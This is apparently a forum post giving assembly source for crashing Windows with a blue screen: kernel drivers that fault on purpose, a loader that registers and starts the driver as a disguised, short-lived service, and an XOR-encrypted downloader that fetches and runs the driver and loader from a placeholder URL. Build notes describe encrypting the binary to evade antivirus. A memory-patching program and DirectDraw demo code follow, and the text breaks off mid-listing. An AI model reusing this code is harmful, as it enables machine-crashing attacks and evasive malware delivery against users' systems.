 

BSOD

BSOD - 2012-02-11 02:10:58.093333   
Elisaveta

1. При помощи драйвера:

; =====================================
; ------------- BSOD.sys ---------------
; (requires an installed WINDDK, e.g. build 3790)
;
; 32-bit MASM kernel-mode driver whose DriverEntry deliberately reads through
; a NULL pointer. The code runs in kernel mode, so the expected outcome of that
; read is a bugcheck of the whole machine as soon as the driver is started.
; The driver has no unload routine, no device object and no other function.
; Running it at all requires the right to register and start a kernel-driver
; service, so every load leaves a service-creation trace.
;
; ABI:  stdcall, two dword arguments (implied by RETN 8); neither is read
; Out:  eax = NTSTATUS
; =====================================
        .686
        .model flat, stdcall

        extern DbgPrint:PROC

        .code
DriverEntry proc
        push    offset as
        CALL    DbgPrint                ; debugger output "COOL" before the faulting read
        pop     eax                     ; discard the argument pushed for DbgPrint
        XOR     EAX, EAX                ; eax = 0
        MOV     EAX, [EAX]              ; load from address 0: the deliberate kernel-mode fault
        push    offset am
        CALL    DbgPrint                ; reached only if the load above did not fault
        pop     eax
        mov     eax, 0C0000182h         ; error-severity NTSTATUS (top two bits set), so the load is reported as failed
        RETN    8                       ; stdcall return, removes the two DriverEntry arguments
DriverEntry endp

        .data
as      DB "COOL", 0Dh, 0Ah, 0
am      DB "AMNESIA", 0Dh, 0Ah, 0

end DriverEntry

; ------------------ assemble.bat ---------------
; Assembles BSOD.asm with ml and links the object as a native-subsystem driver
; image against ntoskrnl.lib taken from the DDK tree.
@ECHO OFF
SET FILE_NAME=BSOD
REM everyone adjusts this line for their own setup!
SET ntoskrnl=C:\WINDDK\3790.1830\lib\wxp\i386\ntoskrnl.lib
IF EXIST %FILE_NAME%.obj DEL %FILE_NAME%.obj
ml /nologo /c /coff %FILE_NAME%.asm
IF NOT EXIST %FILE_NAME%.obj GOTO err
link /nologo /driver /base:0x10000 /align:32 /out:%FILE_NAME%.sys /subsystem:native %FILE_NAME%.obj %ntoskrnl%
GOTO end
:err
ECHO -ERR!
:end
;==============================================================;
; The variant that follows does not require installing the Driver Development Kit
; исходники, ntoskrnl.lib берём с WASM.ru (классный сайт)
; остальное: ntdef.inc, ntstatus.inc, ntddk.inc, ntoskrnl.inc — там же
; (или юзаем protoize (работает на ура))
; ---------- BSOD.asm, second variant ----------
; MASM kernel-mode driver built from the standalone include files instead of
; the DDK. DriverEntry takes the address of the data bytes "RING" and calls it,
; so execution continues in a data buffer while in kernel mode; the author's
; stated purpose is to bring the system down.
        .386
        .model flat, stdcall
        option casemap:none

        include ntstatus.inc
        include ntddk.inc
        include ntoskrnl.inc
        includelib ntoskrnl.lib
        include Strings.mac

IOPM_SIZE equ 2000h                     ; defined but not referenced anywhere in this listing

        .data
my      db "R","I","N","G",0

        .code
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING ; or DWORD
        mov     eax,offset my
        call    eax                     ; author: this is not Ring 3 here; the aim is to crash the system
        ret
        ; author: or simply hang the system by switching off kernel protection:
        ; MOV EAX,CR0
        ; AND EAX,0FFFEFFFFh            (the mask clears bit 16 of CR0, the WP write-protect bit)
        ; MOV CR0,EAX
DriverEntry endp
end DriverEntry

; ---------- Make.bat -----------------;
; Assembles and links BSOD.asm as a native-subsystem driver with the MASM32 tools.
@echo off
goto make
:make
\masm32\bin\ml /nologo /c /coff BSOD.asm
\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:BSOD.sys /subsystem:native BSOD.obj
del BSOD.obj
echo.
pause
;=====================================;
;---------- DriverLoader.asm ---------;
; User-mode loader for BSOD.sys. It registers the file as a demand-start
; kernel-driver service through the Service Control Manager, writes its own
; process id into the service's registry key, starts the service, and then
; deletes both the registry value and the service again.
; Artefacts visible to monitoring, all taken from the calls below:
;   - service name "BSOD", display name "Current Data fetcher.",
;     type SERVICE_KERNEL_DRIVER, image path = full path of BSOD.sys
;   - registry key SYSTEM\CurrentControlSet\Services\BSOD, value "ProcessId"
;   - the service entry is removed right after StartService, so it is
;     short-lived; the creation itself still goes through the SCM.
        .386
        .model flat, stdcall
        option casemap:none

        include c:\masm32\include\windows.inc
        include c:\masm32\include\kernel32.inc
        include c:\masm32\include\user32.inc
        include c:\masm32\include\advapi32.inc

        includelib c:\masm32\lib\kernel32.lib
        includelib c:\masm32\lib\user32.lib
        includelib c:\masm32\lib\advapi32.lib

        include Strings.mac

        .code
start proc

LOCAL fOK:BOOL
LOCAL hSCManager:HANDLE
LOCAL hService:HANDLE
LOCAL acDriverPath[MAX_PATH]:CHAR
LOCAL hKey:HANDLE
LOCAL dwProcessId:DWORD

        and fOK, 0                      ; fOK = FALSE until StartService has been called

        ; Opening the SCM with create-service access is the privilege gate for everything below.
        invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
        .if eax != NULL
                mov hSCManager, eax

                ; The pushed dword is a scratch slot on the stack; esp is passed as
                ; the last argument so the call can store a pointer there, and the
                ; pop afterwards discards it.
                push eax
                invoke GetFullPathName, $CTA0("BSOD.sys"), sizeof acDriverPath, addr acDriverPath, esp
                pop eax

                ; Register BSOD.sys as a demand-start kernel driver.
                invoke CreateService, hSCManager, $CTA0("BSOD"), $CTA0("Current Data fetcher."), \
                        SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
                        SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
                .if eax != NULL
                        mov hService, eax

                        invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, \
                                $CTA0("SYSTEM\\CurrentControlSet\\Services\\BSOD"), \
                                0, KEY_CREATE_SUB_KEY + KEY_SET_VALUE, addr hKey
                        .if eax == ERROR_SUCCESS
                                ; Store this process's id under the service key before the driver starts.
                                invoke GetCurrentProcessId
                                mov dwProcessId, eax
                                invoke RegSetValueEx, hKey, $CTA0("ProcessId", szProcessId), NULL, REG_DWORD, \
                                        addr dwProcessId, sizeof DWORD
                                .if eax == ERROR_SUCCESS
                                        ; Starting the service is what runs the driver's DriverEntry.
                                        invoke StartService, hService, 0, NULL
                                        inc fOK
                                        invoke RegDeleteValue, hKey, addr szProcessId
                                .else
                                        invoke MessageBox, NULL, $CTA0("Can't add Process ID into registry."), \
                                                NULL, MB_ICONSTOP
                                .endif
                                invoke RegCloseKey, hKey
                        .else
                                invoke MessageBox, NULL, $CTA0("Can't open registry."), NULL, MB_ICONSTOP
                        .endif

                        ; The service entry is removed whether or not the start succeeded.
                        invoke DeleteService, hService
                        invoke CloseServiceHandle, hService
                .else
                        invoke MessageBox, NULL, $CTA0("Can't register driver."), NULL, MB_ICONSTOP
                .endif
                invoke CloseServiceHandle, hSCManager
        .else
                invoke MessageBox, NULL, $CTA0("Can't connect to Service Control Manager."), \
                        NULL, MB_ICONSTOP
        .endif

        ; Empty block: nothing is done with fOK in this listing.
        .if fOK
        .endif

        invoke ExitProcess, 0

start endp

end start

; --------------- DriverLoader.bat ----------------;
; Assembles and links DriverLoader.asm as a Windows-subsystem executable.
@echo off
\masm32\bin\ml /c /coff DriverLoader.asm
if errorlevel 1 goto exit
\masm32\bin\link /subsystem:windows DriverLoader.obj
if exist DriverLoader.obj del DriverLoader.obj
goto exit
;==================================================;
; So what next? Maybe like this?
; -------------- URLDownloadToFile.asm ------------;
; MASM32 user-mode program in two parts:
;   1. start..my_begin: a loop that XORs every byte from amnesia_begin to
;      amnesia_end with the constant 77h, in place, and then falls through
;      into that same range.
;   2. amnesia_begin..amnesia_end: code plus string data that resolves
;      URLDownloadToFileA (urlmon.dll) and ShellExecuteA (shell32.dll) at run
;      time through LoadLibraryA/GetProcAddress, and uses them twice to fetch
;      a file from a URL to a fixed path on the user's desktop and "open" it.
; Indicators a defender can take from this listing: a code section linked
; writable and executable (see Build.bat), a single-byte XOR loop at the entry
; point, the two API names resolved by string rather than imported, and the
; hard-coded desktop paths BSOD.sys and DriverLoader.exe.
        .386
        .mmx
        .model flat, stdcall
        option casemap :none

        include \masm32\include\windows.inc
        include \masm32\include\kernel32.inc
        includelib \masm32\lib\kernel32.lib

        .code
start:
        ; simple byte-wise XOR crypter
        MOV     ESI, amnesia_begin      ; encrypt from here...
        MOV     EDI, ESI                ; source and destination are the same bytes (in-place)
        MOV     ECX, amnesia_end - amnesia_begin ; ...for as many bytes as needed...
my_begin:
        LODSB
        XOR     AL, 77h                 ; author: or add al,XXh, with sub al,XXh in the decryptor
        STOSB
        LOOP    my_begin

amnesia_begin:
        xor     eax, eax
        mov     ecx, offset DQWORD_VAL
        db 00fh, 10h, 01h               ; hand-encoded instruction; the bytes decode as movups xmm0, [ecx]
        db 00fh, 50h, 0c0h              ; hand-encoded instruction; the bytes decode as movmskps eax, xmm0
        test    eax, eax                ; eax holds the sign-bit mask of the 16 bytes at DQWORD_VAL
        jz      Exit                    ; skip everything if the mask came back zero

        ; --- stage 1: fetch TargetURLdr to PathToSavedr ---
        push    offset urlmonStr
        call    LoadLibraryA
        push    offset downloadfunc
        push    eax
        call    GetProcAddress          ; eax = address of URLDownloadToFileA
        push    0
        push    0
        push    offset PathToSavedr
        push    offset TargetURLdr
        push    0
        call    eax

        ; --- stage 2: "open" the file saved at PathToSavedr ---
        push    offset shell32Str
        call    LoadLibraryA
        push    offset executefunc
        push    eax
        call    GetProcAddress          ; eax = address of ShellExecuteA
        push    0
        push    0
        push    0
        push    offset PathToSavedr
        push    offset OpenString
        push    0
        call    eax

        ; --- stage 3: fetch TargetURL to PathToSave ---
        push    offset urlmonStr
        call    LoadLibraryA
        push    offset downloadfunc
        push    eax
        call    GetProcAddress
        push    0
        push    0
        push    offset PathToSave
        push    offset TargetURL
        push    0
        call    eax

        ; --- stage 4: "open" the file saved at PathToSave ---
        push    offset shell32Str
        call    LoadLibraryA
        push    offset executefunc
        push    eax
        call    GetProcAddress
        push    0
        push    0
        push    0
        push    offset PathToSave
        push    offset OpenString
        push    0
        call    eax

Exit:
        push    0
        call    ExitProcess

        ; String and constant data; it lies inside the amnesia_begin..amnesia_end
        ; range, so the XOR loop covers it together with the code.
OpenString      db "open",0
urlmonStr       db "urlmon.dll",0
shell32Str      db "shell32.dll",0
downloadfunc    db "URLDownloadToFileA",0
executefunc     db "ShellExecuteA",0
TargetURL       db "http://127.0.0.1/test.sys",0 ; author: 127.0.0.1 is a stand-in for the real address
PathToSave      db "C:\Documents and Settings\Пользователь\Рабочий стол\BSOD.sys",0
TargetURLdr     db "http://127.0.0.1/test.exe",0
PathToSavedr    db "C:\Documents and Settings\Пользователь\Рабочий стол\DriverLoader.exe",0
DQWORD_VAL      db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh
amnesia_end:

end start

; -------------------- Build.bat -------------------;
; /section:.text,RWE marks the code section readable, writable and executable;
; the in-place XOR loop above needs the write permission on its own code.
@echo off
\masm32\bin\ml /c /coff URLDownloadToFile.asm
\masm32\bin\link /subsystem:windows /section:.text,RWE URLDownloadToFile.obj
if exist *.obj del *.obj
; author: after the build (it will set off alarms!) open the file in a debugger, run it so the code gets encrypted,
; then Save to Executable -> done
; author: (if something still gets in the way -> multi-layer encryption can be added, or the field cleared altogether)
;——————————————————–;
; Из user mode в BSOD без написания драйвера:
; ——————————————————-;
; ------------Txt-Exe-Txt-Loader.asm----------------; .486 .model flat, stdcall option casemap :none include \masm32\include\windows.inc include \masm32\include\masm32.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\shell32.inc includelib \masm32\lib\masm32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\shell32.lib ; include - необходимый минимум .data My db "Hallo.txt",0 App db "Kernel Editor",0 ; Моя работа... :) Err1 db "Program not found :(",0 ; prog db "Hallo.exe",0 ; Имя проги bufwr DWORD 90h ; nop va DWORD 579C03h ; Это первый адрес, по которому надо произвести запись va2 DWORD 579C04h ; А это второй ; Кормовые,носовые товсь,пли!!! .data? bufr dw ? ; Байт, в который производится чтение pinfo PROCESS_INFORMATION &lt;&gt; ; Инфа о процессе sinfo STARTUPINFO &lt;&gt; ; инфа о запуске n DWORD ? ; Кол-во байтов .code start: ; ОффициЯльное начало invoke CopyFile,ADDR My,ADDR prog,0 invoke CreateProcess,addr prog,NULL,NULL,NULL,FALSE,CREATE_NEW_CONSOLE OR NORMAL_PRIORITY_CLASS,NULL,NULL,addr sinfo,addr pinfo ; Создаем процесс.. CREATE_NEW_CONSOLE OR NORMAL_PRIORITY_CLASS для того, чтобы запускаемая прога не сворачивалась. .IF eax == 0 ; Если EAX(результат) равен 0(прога не запустилась) invoke MessageBox,NULL,addr Err1,addr App,MB_OK ; Выдаем сообщение invoke ExitProcess,0 ; И выходим :) .ENDIF ; В нашем деле главное что?Правильно.Вовремя смыться. .WHILE TRUE ; Цикл.макросы.Хорошо. 
invoke ReadProcessMemory,pinfo.hProcess,va,addr bufr,1,n ; Читаем память .IF eax != 0 ; Если все ОК invoke WriteProcessMemory,pinfo.hProcess,va,addr bufwr,1,n ; Пишем куда надо NOP invoke WriteProcessMemory,pinfo.hProcess,va2,addr bufwr,1,n ; И сюда тоже NOP invoke ResumeThread,addr pinfo.hThread ; Отправляем прогу дальше лесом пока не заблудится invoke CloseHandle,pinfo.hThread ; Сворачиваем мокруху invoke ExitThread,0 invoke ExitProcess,0 ; Уходим .ENDIF invoke DeleteFile,ADDR prog .ENDW end start ; ОффициаЯльный конец ; ----------------- Hallo.asm -----------; format PE GUI 4.0 entry start include 'win32a.inc' include 'ddraw.inc' section '.text' code readable executable start: invoke GetModuleHandleA,NULL mov [hinstance],eax invoke LoadIconA,NULL,IDI_APPLICATION mov [wc.hIcon],eax invoke LoadCursorA,NULL,IDC_ARROW mov [wc.hCursor],eax mov [wc.style],0 mov [wc.lpfnWndProc],WindowProc mov [wc.cbClsExtra],0 mov [wc.cbWndExtra],0 mov eax,[hinstance] mov [wc.hInstance],eax mov [wc.hbrBackground],0 mov dword [wc.lpszMenuName],NULL mov dword [wc.lpszClassName],_class invoke RegisterClassA,wc test eax,eax jz startup_error invoke CreateWindowExA,\ 0,_class,_title,WS_POPUP+WS_VISIBLE,0,0,0,0,NULL,NULL,[hinstance],NULL test eax,eax jz startup_error mov [hwnd],eax invoke DirectDrawCreate,NULL,DDraw,NULL or eax,eax jnz ddraw_error cominvk DDraw,SetCooperativeLevel,\ [hwnd],DDSCL_EXCLUSIVE+DDSCL_FULLSCREEN or eax,eax jnz ddraw_error cominvk DDraw,SetDisplayMode,\ 640,480,8 or eax,eax jnz ddraw_error mov [ddsd.dwSize],sizeof.DDSURFACEDESC mov [ddsd.dwFlags],DDSD_CAPS+DDSD_BACKBUFFERCOUNT mov [ddsd.ddsCaps.dwCaps],DDSCAPS_PRIMARYSURFACE+DDSCAPS_FLIP+DDSCAPS_COMPLEX mov [ddsd.dwBackBufferCount],1 cominvk DDraw,CreateSurface,\ ddsd,DDSPrimary,NULL or eax,eax jnz ddraw_error mov [ddscaps.dwCaps],DDSCAPS_BACKBUFFER cominvk DDSPrimary,GetAttachedSurface,\ ddscaps,DDSBack or eax,eax jnz ddraw_error mov esi,picture call load_picture jc open_error mov esi,picture call load_palette jc 
open_error invoke GetTickCount mov [last_tick],eax jmp paint main_loop: invoke PeekMessageA,msg,NULL,0,0,PM_NOREMOVE or eax,eax jz no_message invoke GetMessageA,msg,NULL,0,0 or eax,eax jz end_loop invoke TranslateMessage,msg invoke DispatchMessageA,msg jmp main_loop no_message: cmp [active],0 je sleep cominvk DDSPrimary,IsLost or eax,eax jz paint cmp eax,DDERR_SURFACELOST jne end_loop cominvk DDSPrimary,Restore paint: mov [rect.top],0 mov [rect.bottom],480 mov [rect.left],0 mov [rect.right],640 cominvk DDSBack,BltFast,\ 0,0,[DDSPicture],rect,DDBLTFAST_SRCCOLORKEY or eax,eax jnz paint_done movzx eax,[frame] xor edx,edx mov ebx,10 div ebx sal eax,6 add eax,480 mov [rect.top],eax add eax,64 mov [rect.bottom],eax sal edx,6 mov [rect.left],edx add edx,64 mov [rect.right],edx cominvk DDSBack,BltFast,\ [x],[y],[DDSPicture],rect,DDBLTFAST_SRCCOLORKEY cominvk DDSPrimary,SetPalette,[DDPalette] cominvk DDSPrimary,Flip,0,0 paint_done: invoke GetTickCount mov ebx,eax sub ebx,[last_tick] cmp ebx,20 jb main_loop add [last_tick],20 inc [frame] cmp [frame],60 jb main_loop mov [frame],0 jmp main_loop sleep: invoke WaitMessage jmp main_loop ddraw_error: mov eax,_ddraw_error jmp error open_error: mov eax,_open_error error: invoke MessageBoxA,[hwnd],eax,_error,MB_OK+MB_ICONERROR invoke DestroyWindow,[hwnd] invoke PostQuitMessage,1 jmp main_loop startup_error: invoke MessageBoxA,[hwnd],_startup_error,_error,MB_OK+MB_ICONERROR end_loop: invoke ExitProcess,[msg.wParam] include 'gif87a.inc' proc WindowProc hwnd,wmsg,wparam,lparam push ebx esi edi mov eax,[wmsg] cmp eax,WM_CREATE je .wmcreate cmp eax,WM_DESTROY je .wmdestroy cmp eax,WM_ACTIVATE je .wmactivate cmp eax,WM_SETCURSOR je .wmsetcursor cmp eax,WM_MOUSEMOVE je .wmmousemove cmp eax,WM_KEYDOWN je .wmkeydown .defwindowproc: invoke DefWindowProcA,[hwnd],[wmsg],[wparam],[lparam] jmp .finish .wmcreate: xor eax,eax jmp .finish .wmkeydown: cmp [wparam],VK_ESCAPE jne .finish .wmdestroy: cominvk DDraw,RestoreDisplayMode cominvk DDraw,Release 
invoke PostQuitMessage,0 xor eax,eax jmp .finish .wmactivate: mov eax,[wparam] mov [active],al jmp .finish .wmsetcursor: invoke SetCursor,0 xor eax,eax jmp .finish .wmmousemove: movsx eax,word [lparam] mov [x],eax movsx eax,word [lparam+2] mov [y],eax .finish: pop edi esi ebx ret endp section '.data' data readable writeable _title db 'flat assembler DirectDraw application',0 _class db 'FDDRAW32',0 _error db 'Error',0 _startup_error db 'Startup failed.',0 _ddraw_error db 'Direct Draw initialization failed.',0 _open_error db 'А вот ??? вам,а не скамейки !!!',0 picture db 'DDRAW.GIF',0 section '.bss' readable writeable hinstance dd ? hwnd dd ? wc WNDCLASS msg MSG ddsd DDSURFACEDESC ddscaps DDSCAPS DDraw DirectDraw DDSPrimary DirectDrawSurface DDSBack DirectDrawSurface DDSPicture DirectDrawSurface DDPalette DirectDrawPalette bytes_count dd ? last_tick dd ? frame db ? active db ? LZW_bits db ? LZW_table rd (0F00h-2)*2 buffer rb 40000h rect RECT x dd ? y dd ? section '.idata' import data readable library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ ddraw,'DDRAW.DLL' import kernel,\ GetModuleHandleA,'GetModuleHandleA',\ CreateFileA,'CreateFileA',\ ReadFile,'ReadFile',\ CloseHandle,'CloseHandle',\ GetTickCount,'GetTickCount',\ ExitProcess,'ExitProcess' import user,\ RegisterClassA,'RegisterClassA',\ CreateWindowExA,'CreateWindowExA',\ DestroyWindow,'DestroyWindow',\ DefWindowProcA,'DefWindowProcA',\ GetMessageA,'GetMessageA',\ PeekMessageA,'PeekMessageA',\ TranslateMessage,'TranslateMessage',\ DispatchMessageA,'DispatchMessageA',\ LoadCursorA,'LoadCursorA',\ LoadIconA,'LoadIconA',\ SetCursor,'SetCursor',\ MessageBoxA,'MessageBoxA',\ PostQuitMessage,'PostQuitMessage',\ WaitMessage,'WaitMessage' import ddraw,\ DirectDrawCreate,'DirectDrawCreate' ; compile FASM 1.68 -&gt; Run Txt-Exe-Txt-Loader.exe -&gt; O.K. 
-&gt; ; 2Run Txt-Exe-Txt-Loader.exe -&gt;&gt; BSOD ; ----------------DDRAW.GIF-----------------------; GIF ; ----------------GIF87A.INC-----------------------; virtual at buffer GIFHEADER: .ID dd ? .ver dw ? .width dw ? .height dw ? .bits db ? .background db ? .reserved db ? .length = $ - GIFHEADER end virtual load_picture: invoke CreateFileA,esi,GENERIC_READ,0,0,OPEN_EXISTING,0,0 mov edi,eax invoke ReadFile,edi,GIFHEADER,40000h,bytes_count,0 invoke CloseHandle,edi cmp [GIFHEADER.ID],'GIF8' jne picture_error cmp [GIFHEADER.ver],'7a' jne picture_error mov al,[GIFHEADER.bits] and al,111b cmp al,111b jne picture_error add [bytes_count],buffer mov esi,buffer+GIFHEADER.length+256*3 mov edi,esi find_image: cmp esi,[bytes_count] jae picture_error lodsb cmp al,',' jne find_image add esi,4 xor eax,eax lodsw mov ebx,eax lodsw add esi,2 mov [ddsd.dwSize],sizeof.DDSURFACEDESC mov [ddsd.dwFlags],DDSD_CAPS+DDSD_WIDTH+DDSD_HEIGHT+DDSD_CKSRCBLT mov [ddsd.ddsCaps.dwCaps],DDSCAPS_OFFSCREENPLAIN+DDSCAPS_SYSTEMMEMORY mov [ddsd.dwWidth],ebx mov [ddsd.dwHeight],eax movzx eax,[GIFHEADER.background] mov [ddsd.ddckCKSrcBlt.dwColorSpaceLowValue],eax mov [ddsd.ddckCKSrcBlt.dwColorSpaceHighValue],eax cominvk DDraw,CreateSurface,\ ddsd,DDSPicture,0 or eax,eax jnz picture_error cominvk DDSPicture,Lock,\ 0,ddsd,DDLOCK_WAIT,0 mov edi,esi mov edx,esi mov ebx,buffer add ebx,[bytes_count] link_streams: cmp esi,[bytes_count] jae picture_error lodsb movzx ecx,al rep movsb or al,al jnz link_streams mov edi,[ddsd.lpSurface] mov ebx,edx mov [LZW_bits],0 LZW_clear: xor edx,edx LZW_decompress_loop: mov ch,9 cmp edx,(100h-2)*8 jbe LZW_read_bits mov ch,10 cmp edx,(300h-2)*8 jbe LZW_read_bits mov ch,11 cmp edx,(700h-2)*8 jbe LZW_read_bits mov ch,12 LZW_read_bits: mov cl,[LZW_bits] mov eax,[ebx] shr eax,cl xchg cl,ch mov esi,1 shl esi,cl dec esi and eax,esi add cl,ch LZW_read_bits_count: cmp cl,8 jbe LZW_read_bits_ok sub cl,8 inc ebx jmp LZW_read_bits_count LZW_read_bits_ok: mov [LZW_bits],cl cmp eax,100h jb 
LZW_single_byte je LZW_clear sub eax,102h jc LZW_end shl eax,3 cmp eax,edx ja picture_error mov ecx,[LZW_table+eax] mov esi,[LZW_table+eax+4] mov [LZW_table+edx+4],edi rep movsb mov eax,[LZW_table+eax] inc eax mov [LZW_table+edx],eax jmp LZW_decompress_next LZW_single_byte: mov [LZW_table+edx],2 mov [LZW_table+edx+4],edi stosb LZW_decompress_next: add edx,8 jmp LZW_decompress_loop LZW_end: cominvk DDSPicture,Unlock,0 mov eax,[DDSPicture] clc ret picture_error: stc ret load_palette: invoke CreateFileA,esi,GENERIC_READ,0,0,OPEN_EXISTING,0,0 mov edi,eax invoke ReadFile,edi,buffer,GIFHEADER.length+256*3,bytes_count,0 cmp [bytes_count],GIFHEADER.length+256*3 jne picture_error invoke CloseHandle,edi cmp [GIFHEADER.ID],'GIF8' jne picture_error cmp [GIFHEADER.ver],'7a' jne picture_error mov al,[GIFHEADER.bits] and al,111b cmp al,111b jne picture_error mov esi,buffer+GIFHEADER.length mov edi,buffer+400h mov ecx,256 convert_palette: movsw movsb xor al,al stosb loop convert_palette cominvk DDraw,CreatePalette,\ DDPCAPS_8BIT+DDPCAPS_ALLOW256,buffer+400h,DDPalette,0 or eax,eax jnz picture_error clc ret ; ---------------------------- DDRAW.INC ---------------------------; interface DirectDraw,\ QueryInterface,\ AddRef,\ Release,\ Compact,\ CreateClipper,\ CreatePalette,\ CreateSurface,\ DuplicateSurface,\ EnumDisplayModes,\ EnumSurfaces,\ FlipToGDISurface,\ GetCaps,\ GetDisplayMode,\ GetFourCCCodes,\ GetGDISurface,\ GetMonitorFrequency,\ GetScanLine,\ GetVerticalBlankStatus,\ Initialize,\ RestoreDisplayMode,\ SetCooperativeLevel,\ SetDisplayMode,\ WaitForVerticalBlank,\ GetAvailableVidMem,\ GetSurfaceFromDC,\ RestoreAllSurfaces,\ TestCooperativeLevel,\ GetDeviceIdentifier,\ StartModeTest,\ EvaluateMode interface DirectDrawSurface,\ QueryInterface,\ AddRef,\ Release,\ AddAttachedSurface,\ AddOverlayDirtyRect,\ Blt,\ BltBatch,\ BltFast,\ DeleteAttachedSurface,\ EnumAttachedSurfaces,\ EnumOverlayZOrders,\ Flip,\ GetAttachedSurface,\ GetBltStatus,\ GetCaps,\ GetClipper,\ 
GetColorKey,\ GetDC,\ GetFlipStatus,\ GetOverlayPosition,\ GetPalette,\ GetPixelFormat,\ GetSurfaceDesc,\ Initialize,\ IsLost,\ Lock,\ ReleaseDC,\ Restore,\ SetClipper,\ SetColorKey,\ SetOverlayPosition,\ SetPalette,\ Unlock,\ UpdateOverlay,\ UpdateOverlayDisplay,\ UpdateOverlayZOrder,\ GetDDInterface,\ PageLock,\ PageUnlock,\ SetSurfaceDesc,\ SetPrivateData,\ GetPrivateData,\ FreePrivateData,\ GetUniquenessValue,\ ChangeUniquenessValue,\ SetPriority,\ GetPriority,\ SetLOD,\ GetLOD interface DirectDrawPalette,\ QueryInterface,\ AddRef,\ Release,\ GetCaps,\ GetEntries,\ Initialize,\ SetEntries interface DirectDrawClipper,\ QueryInterface,\ AddRef,\ Release,\ GetClipList,\ GetHWnd,\ Initialize,\ IsClipListChanged,\ SetClipList,\ SetHWnd interface DirectDrawColorControl,\ QueryInterface,\ AddRef,\ Release,\ GetColorControls,\ SetColorControls interface DirectDrawGammaControl,\ QueryInterface,\ AddRef,\ Release,\ GetGammaRamp,\ SetGammaRamp struct DDCOLORKEY dwColorSpaceLowValue dd ? dwColorSpaceHighValue dd ? ends struct DDPIXELFORMAT dwSize dd ? dwFlags dd ? dwFourCC dd ? union dwRGBBitCount dd ? dwYUVBitCount dd ? dwZBufferBitDepth dd ? dwAlphaBitDepth dd ? dwLuminanceBitCount dd ? dwBumpBitCount dd ? ends union dwRBitMask dd ? dwYBitMask dd ? dwStencilBitDepth dd ? dwLuminanceBitMask dd ? dwBumpDuBitMask dd ? ends union dwGBitMask dd ? dwUBitMask dd ? dwZBitMask dd ? dwBumpDvBitMask dd ? ends union dwBBitMask dd ? dwVBitMask dd ? dwStencilBitMask dd ? dwBumpLuminanceBitMask dd ? ends union dwRGBAlphaBitMask dd ? dwYUVAlphaBitMask dd ? dwLuminanceAlphaBitMask dd ? dwRGBZBitMask dd ? dwYUVZBitMask dd ? ends ends struct DDSCAPS dwCaps dd ? ends struct DDSURFACEDESC dwSize dd ? dwFlags dd ? dwHeight dd ? dwWidth dd ? union lPitch dd ? dwLinearSize dd ? ends dwBackBufferCount dd ? union dwMipMapCount dd ? dwZBufferBitDepth dd ? dwRefreshRate dd ? ends dwAlphaBitDepth dd ? dwReserved dd ? lpSurface dd ? 
ddckCKDestOverlay DDCOLORKEY ddckCKDestBlt DDCOLORKEY ddckCKSrcOverlay DDCOLORKEY ddckCKSrcBlt DDCOLORKEY ddpfPixelFormat DDPIXELFORMAT ddsCaps DDSCAPS ends ; А вот флаг вам(и на бронепоезд) DDSCL_FULLSCREEN = 000000001h DDSCL_ALLOWREBOOT = 000000002h DDSCL_NOWINDOWCHANGES = 000000004h DDSCL_NORMAL = 000000008h DDSCL_EXCLUSIVE = 000000010h DDSCL_ALLOWMODEX = 000000040h DDBLT_ALPHADEST = 000000001h DDBLT_ALPHADESTCONSTOVERRIDE = 000000002h DDBLT_ALPHADESTNEG = 000000004h DDBLT_ALPHADESTSURFACEOVERRIDE = 000000008h DDBLT_ALPHAEDGEBLEND = 000000010h DDBLT_ALPHASRC = 000000020h DDBLT_ALPHASRCCONSTOVERRIDE = 000000040h DDBLT_ALPHASRCNEG = 000000080h DDBLT_ALPHASRCSURFACEOVERRIDE = 000000100h DDBLT_ASYNC = 000000200h DDBLT_COLORFILL = 000000400h DDBLT_DDFX = 000000800h DDBLT_DDROPS = 000001000h DDBLT_KEYDEST = 000002000h DDBLT_KEYDESTOVERRIDE = 000004000h DDBLT_KEYSRC = 000008000h DDBLT_KEYSRCOVERRIDE = 000010000h DDBLT_ROP = 000020000h DDBLT_ROTATIONANGLE = 000040000h DDBLT_ZBUFFER = 000080000h DDBLT_ZBUFFERDESTCONSTOVERRIDE = 000100000h DDBLT_ZBUFFERDESTOVERRIDE = 000200000h DDBLT_ZBUFFERSRCCONSTOVERRIDE = 000400000h DDBLT_ZBUFFERSRCOVERRIDE = 000800000h DDBLT_WAIT = 001000000h DDBLT_DEPTHFILL = 002000000h DDBLTFAST_NOCOLORKEY = 000000000h DDBLTFAST_SRCCOLORKEY = 000000001h DDBLTFAST_DESTCOLORKEY = 000000002h DDBLTFAST_WAIT = 000000010h DDFLIP_WAIT = 000000001h DDFLIP_EVEN = 000000002h DDFLIP_ODD = 000000004h DDSD_CAPS = 000000001h DDSD_HEIGHT = 000000002h DDSD_WIDTH = 000000004h DDSD_PITCH = 000000008h DDSD_BACKBUFFERCOUNT = 000000020h DDSD_ZBUFFERBITDEPTH = 000000040h DDSD_ALPHABITDEPTH = 000000080h DDSD_LPSURFACE = 000000800h DDSD_PIXELFORMAT = 000001000h DDSD_CKDESTOVERLAY = 000002000h DDSD_CKDESTBLT = 000004000h DDSD_CKSRCOVERLAY = 000008000h DDSD_CKSRCBLT = 000010000h DDSD_MIPMAPCOUNT = 000020000h DDSD_REFRESHRATE = 000040000h DDSD_LINEARSIZE = 000080000h DDSD_ALL = 0000FF9EEh DDSCAPS_RESERVED1 = 000000001h DDSCAPS_ALPHA = 000000002h DDSCAPS_BACKBUFFER = 
